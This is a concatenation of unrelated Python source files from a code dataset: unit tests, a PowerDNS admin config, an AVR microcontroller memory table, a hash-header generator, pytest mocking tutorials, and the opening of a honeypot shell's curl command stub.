def test_dotifydict(self):
self.assertEquals(self.dotifydict.one.two, {'three':'value'})
self.dotifydict.one.two.update({'three':3,'four':4})
self.assertEquals(self.dotifydict.one.two.four, 4)
self.assertEquals(self.dotifydict.one, self.dotifydict.one)
self.assertIn('two.three', (self.dotifydict.one))
self.assertEquals(str(self.dotifydict), "DotifyDict(datadict={'one': DotifyDict(datadict={'two': DotifyDict(datadict={'four': 4, 'three': 3})})})")
self.assertEquals(self.dotifydict.one.two, eval(str(self.dotifydict.one.two)))
class TestCasePath(unittest.TestCase):
def setUp(self):
self.filepath = Path.getTempPath()
def test_path(self):
temp_path = Path.getTempPath()
self.assertEquals(self.filepath, temp_path)
self.assertEquals(self.filepath.name, temp_path.name)
self.assertEquals(self.filepath.parent, temp_path.parent)
self.assertIn(self.filepath.parent.parent.name, self.filepath)
myPathSepTest = Path('c:\\Users/krockman/documents').join('mytest')
self.assertEquals(myPathSepTest, os.path.join('c:','Users','krockman','documents','mytest'))
self.assertEquals({'TestKey', myPathSepTest},{'TestKey',os.path.join('c:','Users','krockman','documents','mytest')})
class TestCaseDocument(unittest.TestCase):
def setUp(self):
self.doc = Document({'Testing':'min'})
self.doc.filepath = Path.getTempPath().join('document.dat')
def test_document(self):
self.assertEquals(self.doc.filepath, Path.getTempPath().join('document.dat'))
self.assertEquals(self.doc, eval(str(self.doc)))
self.doc.save()
self.assertTrue(self.doc.filepath.exists())
def tearDown(self):
self.doc.filepath.remove()
class TestCaseVersion(unittest.TestCase):
def setUp(self):
self.version = Version('2.0.5.Beta')
def test_version(self):
self.assertEquals(self.version,(2,0,5,'Beta'))
self.assertEquals(self.version,'2.0.5.Beta')
self.assertEquals(self.version,eval(str(self.version)))
self.version.update({'status':VersionStatus.Gold})
self.assertNotEquals(self.version,(2,0,5,'Beta'))
class TestCaseDecorators(unittest.TestCase):
@Safe
def test_safe(self):
1/0
@Timer
def test_timer(self, timer):
for i in range(5):
time.sleep(2)
timer.newLap(i)
@Profile
def test_profile(self):
for i in range(5):
(1 / 20 * 5 - 10 + 15) == 1
def main():
unittest.main(verbosity=2)
if __name__ == '__main__':
main() | StarcoderdataPython |
1691495 | <filename>mlprogram/nn/__init__.py<gh_stars>1-10
from mlprogram.nn.aggregated_loss import AggregatedLoss # noqa
from mlprogram.nn.bidirectional_lstm import BidirectionalLSTM # noqa
from mlprogram.nn.cnn import CNN2d # noqa
from mlprogram.nn.embedding import EmbeddingWithMask # noqa
from mlprogram.nn.function import Function # noqa
from mlprogram.nn.mlp import MLP # noqa
from mlprogram.nn.pointer_net import PointerNet # noqa
from mlprogram.nn.separable_convolution import SeparableConv1d # noqa
from mlprogram.nn.tree_convolution import TreeConvolution # noqa
| StarcoderdataPython |
3299784 | # Copyright 2019 ducandu GmbH, All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
from surreal.components.memories.replay_buffer import ReplayBuffer
from surreal.spaces import Dict, Bool, Int
from surreal.tests.test_util import check
class TestReplayBuffer(unittest.TestCase):
"""
Tests sampling and insertion behaviour of the replay_memory module.
"""
record_space = Dict(
states=dict(state1=float, state2=float),
actions=dict(action1=Int(3, shape=(3,))),
reward=float,
terminals=Bool(),
next_states=dict(state1=float, state2=float),
main_axes="B"
)
def test_insert(self):
"""
Simply tests insert op without checking internal logic.
"""
memory = ReplayBuffer(record_space=self.record_space, capacity=4)
# Assert indices 0 before insert.
self.assertEqual(memory.size, 0)
self.assertEqual(memory.index, 0)
# Insert one single record (no batch rank) and check again.
data = self.record_space.sample()
memory.add_records(data)
self.assertTrue(memory.size == 1)
self.assertTrue(memory.index == 1)
# Insert one single record (with batch rank) and check again.
data = self.record_space.sample(1)
memory.add_records(data)
self.assertTrue(memory.size == 2)
self.assertTrue(memory.index == 2)
# Insert two records (batched).
data = self.record_space.sample(2)
memory.add_records(data)
self.assertTrue(memory.size == 4)
self.assertTrue(memory.index == 0)
# Insert one single record (no batch rank, BUT with `single` indicator set for performance reasons)
# and check again.
data = self.record_space.sample()
memory.add_records(data, single=True)
self.assertTrue(memory.size == 4)
self.assertTrue(memory.index == 1)
def test_insert_over_capacity(self):
"""
Tests if insert correctly manages capacity.
"""
capacity = 10
memory = ReplayBuffer(record_space=self.record_space, capacity=capacity)
# Assert indices 0 before insert.
self.assertEqual(memory.size, 0)
self.assertEqual(memory.index, 0)
# Insert one more element than capacity.
data = self.record_space.sample(size=capacity + 1)
memory.add_records(data)
# Size should be equivalent to capacity when full.
self.assertEqual(memory.size, capacity)
# Index should be one over capacity due to modulo.
self.assertEqual(memory.index, 1)
def test_get_records(self):
"""
Tests if retrieval correctly manages capacity.
"""
capacity = 10
memory = ReplayBuffer(record_space=self.record_space, capacity=capacity)
# Insert 1 record.
data = self.record_space.sample(1)
memory.add_records(data)
# Assert we can now fetch 2 elements.
retrieved_data = memory.get_records(num_records=1)
self.assertEqual(1, len(retrieved_data["terminals"]))
check(data, retrieved_data)
# Test duplicate sampling.
retrieved_data = memory.get_records(num_records=5)
self.assertEqual(5, len(retrieved_data["terminals"]))
# Only one record in the memory -> returned samples should all be the exact same.
check(retrieved_data["reward"][0], retrieved_data["reward"][1])
check(retrieved_data["reward"][0], retrieved_data["reward"][2])
check(retrieved_data["reward"][0], retrieved_data["reward"][3])
check(retrieved_data["reward"][0], retrieved_data["reward"][4])
# Now insert another one.
data = self.record_space.sample() # w/o batch rank
memory.add_records(data)
# Pull exactly two records and make sure they are NOT(!) the same.
retrieved_data = memory.get_records(num_records=2)
self.assertEqual(2, len(retrieved_data["terminals"]))
self.assertNotEqual(retrieved_data["reward"][0], retrieved_data["reward"][1])
# Now insert over capacity.
data = self.record_space.sample(capacity)
memory.add_records(data)
# Assert we can fetch exactly capacity elements.
retrieved_data = memory.get_records(num_records=capacity)
self.assertEqual(capacity, len(retrieved_data["terminals"]))
| StarcoderdataPython |
3332204 | import os
basedir = os.path.abspath(os.path.dirname(__file__))
# BASIC APP CONFIG
WTF_CSRF_ENABLED = True
SECRET_KEY = 'We are the world'
BIND_ADDRESS = '0.0.0.0'
PORT = 8080
LOGIN_TITLE = os.getenv( 'ADMIN_LOGIN_TITLE', "PowerDNS" )
# TIMEOUT - for large zones
TIMEOUT = 10
# LOG CONFIG
LOG_LEVEL = 'DEBUG'
LOG_FILE = 'logfile.log'
# For Docker, leave empty string
#LOG_FILE = ''
# Upload
UPLOAD_DIR = os.path.join(basedir, 'upload')
# DATABASE CONFIG
#SQLite
SQLALCHEMY_DATABASE_URI = 'SQLALCHEMY_DATABASE_URI'
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
SQLALCHEMY_TRACK_MODIFICATIONS = True
#Default Auth
BASIC_ENABLED = True
SIGNUP_ENABLED = True
# RECORDS ALLOWED TO EDIT
RECORDS_ALLOW_EDIT = ['A', 'AAAA', 'CNAME', 'SPF', 'PTR', 'MX', 'TXT']
# EXPERIMENTAL FEATURES
PRETTY_IPV6_PTR = False
# SAML Authnetication
SAML_ENABLED = False
SAML_DEBUG = False
| StarcoderdataPython |
1633266 | # dictionary microcontrollers
# wykys 2018
from avr import InfoAVR
from collections import OrderedDict
mcu_dict = OrderedDict(sorted({
"atxmega384c3": InfoAVR('392K', '32K', '4K'),
"atxmega384d3": InfoAVR('384K', '16K', '4K'),
"atmega256rfr2": InfoAVR('256K', '32K', '8K'),
"atmega2564rfr2": InfoAVR('256K', '32K', '8K'),
"atxmega256a3": InfoAVR('264K', '16K', '4K'),
"atxmega256a3u": InfoAVR('264K', '16K', '4K'),
"atxmega256a3b": InfoAVR('264K', '16K', '4K'),
"atxmega256a3bu": InfoAVR('264K', '16K', '4K'),
"atxmega256c3": InfoAVR('264K', '16K', '4K'),
"atxmega256d3": InfoAVR('264K', '16K', '4K'),
"atmega2560": InfoAVR('256K', '8K', '4K'),
"atmega2561": InfoAVR('256K', '8K', '4K'),
"atxmega192a3": InfoAVR('200K', '16K', '2K'),
"atxmega192a3u": InfoAVR('200K', '16K', '2K'),
"atxmega192c3": InfoAVR('200K', '16K', '2K'),
"atxmega192d3": InfoAVR('200K', '16K', '2K'),
"atmega128rfr2": InfoAVR('128K', '16K', '4K'),
"atmega1284rfr2": InfoAVR('128K', '16K', '4K'),
"atxmega128a1": InfoAVR('136K', '8K', '2K'),
"atxmega128a1u": InfoAVR('136K', '8K', '2K'),
"atxmega128a4u": InfoAVR('136K', '8K', '2K'),
"atxmega128a3": InfoAVR('136K', '8K', '2K'),
"atxmega128a3u": InfoAVR('136K', '8K', '2K'),
"atxmega128b1": InfoAVR('136K', '8K', '2K'),
"atxmega128b3": InfoAVR('136K', '8K', '2K'),
"atxmega128c3": InfoAVR('136K', '8K', '2K'),
"atxmega128d3": InfoAVR('136K', '8K', '2K'),
"atxmega128d4": InfoAVR('136K', '8K', '2K'),
"at43usb320": InfoAVR('128K', '608B', '0B'),
"at90can128": InfoAVR('128K', '4K', '4K'),
"at90usb1286": InfoAVR('128K', '8K', '4K'),
"at90usb1287": InfoAVR('128K', '8K', '4K'),
"atmega128": InfoAVR('128K', '4K', '4K'),
"atmega128a": InfoAVR('128K', '4K', '4K'),
"atmega1280": InfoAVR('128K', '8K', '4K'),
"atmega1281": InfoAVR('128K', '8K', '4K'),
"atmega1284": InfoAVR('128K', '16K', '4K'),
"atmega1284p": InfoAVR('128K', '16K', '4K'),
"atmega128rfa1": InfoAVR('128K', '16K', '4K'),
"atmega103": InfoAVR('128K', '4000B', '4K'),
"atxmega64a1": InfoAVR('68K', '4K', '2K'),
"atxmega64a1u": InfoAVR('68K', '4K', '2K'),
"atxmega64a3": InfoAVR('68K', '4K', '2K'),
"atxmega64a3u": InfoAVR('68K', '4K', '2K'),
"atxmega64a4u": InfoAVR('68K', '4K', '2K'),
"atxmega64b1": InfoAVR('68K', '4K', '2K'),
"atxmega64b3": InfoAVR('68K', '4K', '2K'),
"atxmega64c3": InfoAVR('68K', '4K', '2K'),
"atxmega64d3": InfoAVR('68K', '4K', '2K'),
"atxmega64d4": InfoAVR('68K', '4K', '2K'),
"atmega64rfr2": InfoAVR('64K', '8K', '2K'),
"atmega644rfr2": InfoAVR('64K', '8K', '2K'),
"at90can64": InfoAVR('64K', '4K', '2K'),
"at90scr100": InfoAVR('64K', '4K', '2K'),
"at90usb646": InfoAVR('64K', '4K', '2K'),
"at90usb647": InfoAVR('64K', '4K', '2K'),
"ata5505": InfoAVR('16K', '512B', '512B'),
"ata5790": InfoAVR('16K', '512B', '2112B'),
"ata5795": InfoAVR('8K', '512B', '2112B'),
"ata5272": InfoAVR('8K', '512B', '512B'),
"atmega64": InfoAVR('64K', '4K', '2K'),
"atmega64a": InfoAVR('64K', '4K', '2K'),
"atmega640": InfoAVR('64K', '8K', '4K'),
"atmega644": InfoAVR('64K', '4K', '2K'),
"atmega644a": InfoAVR('64K', '4K', '2K'),
"atmega644p": InfoAVR('64K', '4K', '2K'),
"atmega644pa": InfoAVR('64K', '4K', '2K'),
"atmega645": InfoAVR('64K', '4K', '2K'),
"atmega645a": InfoAVR('64K', '4K', '2K'),
"atmega645p": InfoAVR('64K', '4K', '2K'),
"atmega6450": InfoAVR('64K', '4K', '2K'),
"atmega6450a": InfoAVR('64K', '4K', '2K'),
"atmega6450p": InfoAVR('64K', '4K', '2K'),
"atmega649": InfoAVR('64K', '4K', '2K'),
"atmega649a": InfoAVR('64K', '4K', '2K'),
"atmega649p": InfoAVR('64K', '4K', '2K'),
"atmega6490": InfoAVR('64K', '4K', '2K'),
"atmega6490a": InfoAVR('64K', '4K', '2K'),
"atmega6490p": InfoAVR('64K', '4K', '2K'),
"atmega64c1": InfoAVR('64K', '4K', '2K'),
"atmega64hve": InfoAVR('64K', '4K', '1K'),
"atmega64m1": InfoAVR('64K', '4K', '2K'),
"m3000": InfoAVR('64K', '4K', '0B'),
"atmega406": InfoAVR('40K', '2K', '512B'),
"atxmega32a4": InfoAVR('36K', '4K', '1K'),
"atxmega32a4u": InfoAVR('36K', '4K', '1K'),
"atxmega32c4": InfoAVR('36K', '4K', '1K'),
"atxmega32d4": InfoAVR('36K', '4K', '1K'),
"atxmega32e5": InfoAVR('36K', '4K', '1K'),
"atxmega16e5": InfoAVR('20K', '2K', '512B'),
"atxmega8e5": InfoAVR('10K', '1K', '512B'),
"at90can32": InfoAVR('32K', '2K', '1K'),
"at94k": InfoAVR('32K', '4K', '0B'),
"atmega32": InfoAVR('32K', '2K', '1K'),
"atmega32a": InfoAVR('32K', '2K', '1K'),
"atmega323": InfoAVR('32K', '2K', '1K'),
"atmega324a": InfoAVR('32K', '2K', '1K'),
"atmega324p": InfoAVR('32K', '2K', '1K'),
"atmega324pa": InfoAVR('32K', '2K', '1K'),
"atmega325": InfoAVR('32K', '2K', '1K'),
"atmega325a": InfoAVR('32K', '2K', '1K'),
"atmega325p": InfoAVR('32K', '2K', '1K'),
"atmega325pa": InfoAVR('32K', '2K', '1K'),
"atmega3250": InfoAVR('32K', '2K', '1K'),
"atmega3250a": InfoAVR('32K', '2K', '1K'),
"atmega3250p": InfoAVR('32K', '2K', '1K'),
"atmega3250pa": InfoAVR('32K', '2K', '1K'),
"atmega328": InfoAVR('32K', '2K', '1K'),
"atmega328p": InfoAVR('32K', '2K', '1K'),
"atmega328pb": InfoAVR('32K', '2K', '1K'),
"atmega329": InfoAVR('32K', '2K', '1K'),
"atmega329a": InfoAVR('32K', '2K', '1K'),
"atmega329p": InfoAVR('32K', '2K', '1K'),
"atmega329pa": InfoAVR('32K', '2K', '1K'),
"atmega3290": InfoAVR('32K', '2K', '1K'),
"atmega3290a": InfoAVR('32K', '2K', '1K'),
"atmega3290p": InfoAVR('32K', '2K', '1K'),
"atmega3290pa": InfoAVR('32K', '2K', '1K'),
"atmega32hvb": InfoAVR('32K', '2K', '1K'),
"atmega32hvbrevb": InfoAVR('32K', '2K', '1K'),
"atmega32c1": InfoAVR('32K', '2K', '1K'),
"atmega32m1": InfoAVR('32K', '2K', '1K'),
"atmega32u2": InfoAVR('32K', '1K', '1K'),
"atmega32u4": InfoAVR('32K', '2560B', '1K'),
"atmega32u6": InfoAVR('32K', '2560B', '1K'),
"at43usb355": InfoAVR('24K', '1120B', '0B'),
"atxmega16a4": InfoAVR('20K', '2K', '1K'),
"atxmega16a4u": InfoAVR('20K', '2K', '1K'),
"atxmega16c4": InfoAVR('20K', '2K', '1K'),
"atxmega16d4": InfoAVR('20K', '2K', '1K'),
"at76c711": InfoAVR('16K', '2K', '0B'),
"at90pwm161": InfoAVR('16K', '1K', '512B'),
"at90pwm216": InfoAVR('16K', '1K', '512B'),
"at90pwm316": InfoAVR('16K', '1K', '512B'),
"at90usb162": InfoAVR('16K', '512B', '512B'),
"atmega16": InfoAVR('16K', '1K', '512B'),
"atmega16a": InfoAVR('16K', '1K', '512B'),
"atmega161": InfoAVR('16K', '1K', '512B'),
"atmega162": InfoAVR('16K', '1K', '512B'),
"atmega163": InfoAVR('16K', '1K', '512B'),
"atmega164": InfoAVR('16K', '1K', '512B'),
"atmega164a": InfoAVR('16K', '1K', '512B'),
"atmega164p": InfoAVR('16K', '1K', '512B'),
"atmega164pa": InfoAVR('16K', '1K', '512B'),
"atmega165a": InfoAVR('16K', '1K', '512B'),
"atmega165": InfoAVR('16K', '1K', '512B'),
"atmega165p": InfoAVR('16K', '1K', '512B'),
"atmega165pa": InfoAVR('16K', '1K', '512B'),
"atmega168": InfoAVR('16K', '1K', '512B'),
"atmega168a": InfoAVR('16K', '1K', '512B'),
"atmega168p": InfoAVR('16K', '1K', '512B'),
"atmega168pa": InfoAVR('16K', '1K', '512B'),
"atmega169": InfoAVR('16K', '1K', '512B'),
"atmega169a": InfoAVR('16K', '1K', '512B'),
"atmega169p": InfoAVR('16K', '1K', '512B'),
"atmega169pa": InfoAVR('16K', '1K', '512B'),
"atmega16hva": InfoAVR('16K', '768B', '256B'),
"atmega16hva2": InfoAVR('16K', '1K', '256B'),
"atmega16hvb": InfoAVR('16K', '1K', '512B'),
"atmega16hvbrevb": InfoAVR('16K', '1K', '512B'),
"atmega16m1": InfoAVR('16K', '1K', '512B'),
"attiny1634": InfoAVR('16K', '1K', '256B'),
"atmega16u2": InfoAVR('16K', '512B', '512B'),
"atmega16u4": InfoAVR('16K', '1280B', '512B'),
"attiny167": InfoAVR('16K', '512B', '512B'),
"at90c8534": InfoAVR('8K', '352B', '512B'),
"at90pwm1": InfoAVR('8K', '512B', '512B'),
"at90pwm2": InfoAVR('8K', '512B', '512B'),
"at90pwm2b": InfoAVR('8K', '512B', '512B'),
"at90pwm3": InfoAVR('8K', '512B', '512B'),
"at90pwm3b": InfoAVR('8K', '512B', '512B'),
"at90pwm81": InfoAVR('8K', '256B', '512B'),
"at90s8515": InfoAVR('8K', '512B', '512B'),
"at90s8535": InfoAVR('8K', '512B', '512B'),
"at90usb82": InfoAVR('8K', '512B', '512B'),
"ata6285": InfoAVR('8K', '512B', '320B'),
"ata6286": InfoAVR('8K', '512B', '320B'),
"ata6289": InfoAVR('8K', '512B', '320B'),
"atmega8": InfoAVR('8K', '1K', '512B'),
"atmega8a": InfoAVR('8K', '1K', '512B'),
"atmega8515": InfoAVR('8K', '512B', '512B'),
"atmega8535": InfoAVR('8K', '512B', '512B'),
"atmega88": InfoAVR('8K', '1K', '512B'),
"atmega88a": InfoAVR('8K', '1K', '512B'),
"atmega88p": InfoAVR('8K', '1K', '512B'),
"atmega88pa": InfoAVR('8K', '1K', '512B'),
"atmega8hva": InfoAVR('8K', '768B', '256B'),
"atmega8u2": InfoAVR('8K', '512B', '512B'),
"attiny84": InfoAVR('8K', '512B', '512B'),
"attiny84a": InfoAVR('8K', '512B', '512B'),
"attiny85": InfoAVR('8K', '512B', '512B'),
"attiny861": InfoAVR('8K', '512B', '512B'),
"attiny861a": InfoAVR('8K', '512B', '512B'),
"attiny87": InfoAVR('8K', '512B', '512B'),
"attiny88": InfoAVR('8K', '512B', '64B'),
"at90s4414": InfoAVR('4K', '352B', '256B'),
"at90s4433": InfoAVR('4K', '128B', '256B'),
"at90s4434": InfoAVR('4K', '352B', '256B'),
"atmega48": InfoAVR('4K', '512B', '256B'),
"atmega48a": InfoAVR('4K', '512B', '256B'),
"atmega48pa": InfoAVR('4K', '512B', '256B'),
"atmega48p": InfoAVR('4K', '512B', '256B'),
"attiny4313": InfoAVR('4K', '256B', '256B'),
"attiny43u": InfoAVR('4K', '256B', '64B'),
"attiny44": InfoAVR('4K', '256B', '256B'),
"attiny44a": InfoAVR('4K', '256B', '256B'),
"attiny45": InfoAVR('4K', '256B', '256B'),
"attiny461": InfoAVR('4K', '256B', '256B'),
"attiny461a": InfoAVR('4K', '256B', '256B'),
"attiny48": InfoAVR('4K', '256B', '64B'),
"attiny828": InfoAVR('8K', '512B', '256B'),
"at86rf401": InfoAVR('2K', '224B', '128B'),
"at90s2313": InfoAVR('2K', '128B', '128B'),
"at90s2323": InfoAVR('2K', '128B', '128B'),
"at90s2333": InfoAVR('2K', '224B', '128B'),
"at90s2343": InfoAVR('2K', '128B', '128B'),
"attiny20": InfoAVR('2K', '128B', '0B'),
"attiny22": InfoAVR('2K', '224B', '128B'),
"attiny2313": InfoAVR('2K', '128B', '128B'),
"attiny2313a": InfoAVR('2K', '128B', '128B'),
"attiny24": InfoAVR('2K', '128B', '128B'),
"attiny24a": InfoAVR('2K', '128B', '128B'),
"attiny25": InfoAVR('2K', '128B', '128B'),
"attiny26": InfoAVR('2K', '128B', '128B'),
"attiny261": InfoAVR('2K', '128B', '128B'),
"attiny261a": InfoAVR('2K', '128B', '128B'),
"attiny28": InfoAVR('2K', '0B', '0B'),
"attiny40": InfoAVR('2K', '256B', '0B'),
"at90s1200": InfoAVR('1K', '0B', '64B'),
"attiny9": InfoAVR('1K', '32B', '0B'),
"attiny10": InfoAVR('1K', '32B', '0B'),
"attiny11": InfoAVR('1K', '0B', '64B'),
"attiny12": InfoAVR('1K', '0B', '64B'),
"attiny13": InfoAVR('1K', '64B', '64B'),
"attiny13a": InfoAVR('1K', '64B', '64B'),
"attiny15": InfoAVR('1K', '0B', '64B'),
"attiny4": InfoAVR('512B', '32B', '0B'),
"attiny5": InfoAVR('512B', '32B', '0B'),
}.items(), key=lambda x: x[0], reverse=False))
| StarcoderdataPython |
46939 | <filename>ABC/abc101-abc150/abc117/c.py
# -*- coding: utf-8 -*-
def main():
n, m = map(int, input().split())
xs = sorted(list(map(int, input().split())))
if n >= m:
print(0)
else:
ans = xs[-1] - xs[0]
diff = [0 for _ in range(m - 1)]
for i in range(m - 1):
diff[i] = xs[i + 1] - xs[i]
print(ans - sum(sorted(diff, reverse=True)[:n - 1]))
if __name__ == '__main__':
main()
| StarcoderdataPython |
117003 | <reponame>ciskoinch8/vimrc
# pylint: disable=missing-function-docstring,missing-module-docstring,missing-class-docstring
# pylint: disable=too-few-public-methods
from typing import overload
class ClassA:
@classmethod
@overload
def method(cls, arg1):
pass
@classmethod
@overload
def method(cls, arg1, arg2):
pass
@classmethod
def method(cls, arg1, arg2=None):
pass
ClassA.method(1, 2)
class ClassB:
@overload
def method(self, arg1):
pass
@overload
def method(self, arg1, arg2):
pass
def method(self, arg1, arg2=None):
pass
ClassB().method(1, arg2=2)
| StarcoderdataPython |
3376386 | from datetime import datetime
from livestyled.models.device import Device
from livestyled.models.reality import Reality
class DeviceReality:
def __init__(
self,
id,
device: Device or str,
reality: Reality or str,
value: str,
created_at: datetime,
updated_at: datetime,
):
self.id = id
self.value = value
self.created_at = created_at
self.updated_at = updated_at
if device:
if isinstance(device, Device):
self.device = device
elif isinstance(device, dict):
self.device = Device(**device)
elif isinstance(device, int):
self.device = Device.placeholder(id=device)
else:
self.device = None
if reality:
if isinstance(reality, Reality):
self.reality = reality
elif isinstance(reality, dict):
self.reality = Reality(**reality)
elif isinstance(reality, int):
self.reality = Reality.placeholder(id=reality)
else:
self.reality = None
@classmethod
def placeholder(cls, id):
return cls(
id,
device=None,
reality=None,
value=None,
created_at=None,
updated_at=None
)
@classmethod
def create_new(
cls,
device: Device,
reality: Reality,
value: str
):
device_reality = DeviceReality(
id=None,
device=device,
reality=reality,
value=value,
created_at=None,
updated_at=None,
)
return device_reality
def diff(self, other):
differences = {}
fields = (
'value'
)
for field in fields:
if getattr(self, field) != getattr(other, field):
differences[field] = getattr(self, field)
return differences
| StarcoderdataPython |
1685178 | <filename>tools/hashgen/hashgen.py
#!/usr/bin/env python3
import argparse
import hashlib
def hash(file):
if file[0] == '*':
return bytearray.fromhex(file[1:])
else:
with open(file, 'rb') as f:
return hashlib.sha1(f.read()).digest()
def split_values(x):
s = x.split('=')
return {s[0] : hash(s[1])}
def generate_h(name, hash):
return 'extern const std::vector<unsigned char>& {}();'.format(name)
def generate_c(name, hash):
c_bytes = ", ".join(['0x{:02X}'.format(x) for x in hash])
return 'const std::vector<unsigned char>& {}() {{ static std::vector<unsigned char> hash{{ {} }}; return hash; }}'.format(name, c_bytes)
parser = argparse.ArgumentParser(description="Infinity hash generator")
parser.add_argument('files', metavar='NAME=FILE', type=split_values, nargs='+',
help='Key value pair of names to files to generate hashes for')
parser.add_argument('header_output', type=argparse.FileType('w'), help='Location to store the output header file')
parser.add_argument('source_output', type=argparse.FileType('w'), help='Location to store the output source file')
args = parser.parse_args()
args.header_output.write('#pragma once\n')
args.header_output.write('#include <vector>\n')
for hash in args.files:
args.header_output.write('{}\n'.format(generate_h(*hash.keys(), *hash.values())))
args.source_output.write('#include <vector>\n')
for hash in args.files:
args.source_output.write('{}\n'.format(generate_c(*hash.keys(), *hash.values()))) | StarcoderdataPython |
120890 | <filename>calculator/use__simpleeval__module.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# pip install simpleeval
from simpleeval import simple_eval
print(simple_eval("21 + 21")) # 42
print(simple_eval("2 + 2 * 2")) # 6
print(simple_eval('10 ** 123')) # 1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
print(simple_eval("21 + 19 / 7 + (8 % 3) ** 9")) # 535.7142857142857
print(simple_eval("square(11)", functions={"square": lambda x: x * x})) # 121
| StarcoderdataPython |
3233767 | <filename>src/sizzlews/test/aiohttp_client_test.py
# sizzlews
# Copyright (C) 2020 <NAME>
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import asyncio
from typing import List
import pydantic
from sizzlews.client.aiohttp import SizzleWsAIOClient
from sizzlews.client.common import RPCInvocationError
class MyDTO(pydantic.BaseModel):
field1: int
field2: str
class MyTestApiClient(SizzleWsAIOClient):
async def some_method(self, a: int, b: int):
return await self.async_invoke('api.some_method', a, b)
async def divide_by_zero(self, a: int):
return await self.async_invoke('api.divide_by_zero', a)
async def my_dto_method(self):
return await self.async_invoke('api.my_dto_method', expected_response_type=MyDTO)
async def returns_list_of_dtos(self) -> List[MyDTO]:
return await self.async_invoke('api.returns_list_of_dtos', expected_response_type=MyDTO)
client = MyTestApiClient('http://localhost:8888/rpc')
async def main():
async with client:
print(await client.some_method(1, 2))
try:
print(await client.divide_by_zero(1))
except RPCInvocationError as e:
print("Error: " + e.msg)
try:
print(await client.my_dto_method())
except Exception as e:
print(e)
try:
print("List of DTOs")
print(await client.returns_list_of_dtos())
except Exception as e:
print(e)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| StarcoderdataPython |
3323688 | <reponame>GordonSo/pyMock-examples
from unittest import mock
import pytest_mock
"""
This tutorial contains a number of test function to demonstrate different ways to mock a function
Each of this function can be run or debug individually and have the following setup:
- class A with has a function do_something that will to return a given value as-is
Every test will calls the function with an input value 1
and will mock the function to get the result to return an hijack value of 2
"""
# Here is our demo setup
class A:
def do_something(self, _input_value):
return {"value": _input_value}
input_value = 1
hijack_value = 2
# Let start with running the test end-to-end without mock
def test_without_mock():
# Given we will create an instance
a = A()
# When we call the instance to do something with value X
result = a.do_something(input_value)
# Then the result should be value X
assert result["value"] == input_value
# 1) To mock a function (by forcing your way through)
# Let's hijack the do_something function inside the A class object
def test_hijack_a_function():
# class an instance
a = A()
# We can re-assign the do_something attribute to a 'MagicMock' object with a return value
# NB: mock.MagicMock is from unittest which comes with built-in python
mock_a = mock.MagicMock(return_value={"value": hijack_value})
a.do_something = mock_a
# do something with value X
result = a.do_something(input_value)
# Then we can see that mock_a has been called once
mock_a.assert_called_once_with(input_value)
# the result should be overridden to whatever was hijacked to be return
assert result["value"] == hijack_value
# 2) How to mock a function with a context manager
def test_mock_function_return():
# Instead of displacing the function, we can patch the object and save the reference for us to assert on later
with mock.patch.object(A, "do_something", return_value={"value": hijack_value}) as mock_a:
a = A()
result = a.do_something(input_value)
# Then we can see that mock_a has been called once
mock_a.assert_called_once_with(input_value)
# And assert that the value has been overridden
assert result["value"] == hijack_value
# When we then call the function again outside the context
result2 = a.do_something(input_value)
# And assert that the value has been restored to normal
assert result2["value"] == input_value
# 3) How to mock a function with a context manager
@mock.patch.object(A, "do_something", lambda a,b:{"value": hijack_value})
def test_mock_function_return():
a = A()
result = a.do_something(input_value)
# And assert that the value has been overridden
assert result["value"] == hijack_value
# 3) Using pytest mock
# Inject a mocker fixture into the test
# NB: mocker is a unchangeable magical keyword recognised by pytest_mock
def test_pytest_mock_function_return(mocker: pytest_mock.MockFixture):
# We will patch the A class
# note that we need to specify the path to the function from the source
# In this particular case, it happens to also be where it is called (we will explain further in lesson 2)
mock_do_something = mocker.patch("lesson01_mocks.test_function_mock.A.do_something")
# We will make the displacing object return the hijack value when it is called
mock_do_something.return_value = {"value": hijack_value}
# Let's call the method
a = A()
result = a.do_something(input_value)
# Then we can see that mock_a has been called once
mock_do_something.assert_called_once_with(input_value)
# And assert that the value has been overridden
assert result["value"] == hijack_value
# We can further improve the command with the return value inline
def test_pytest_mock_function_return_improver(mocker: pytest_mock.MockFixture):
# We will patch the A class
mock_do_something = mocker.patch(
"lesson01_mocks.test_function_mock.A.do_something",
return_value={"value": hijack_value},
)
# Let's call the class method
a = A()
result = a.do_something(input_value)
# Then we can see that mock_a has been called once
mock_do_something.assert_called_once_with(input_value)
# And assert that the value has been overridden
assert result["value"] == hijack_value
| StarcoderdataPython |
165367 | <reponame>palwolus/Cyder<gh_stars>1-10
from vfssh.vfs.Command import Command
from vfssh.vfs.error import VFSError
from vfssh.vfs.fs_object import FileObject
import requests
class curl(Command):
def __init__(self, vfs=None):
super().__init__('curl')
self.set_vfs(vfs)
def process(self, **kwargs):
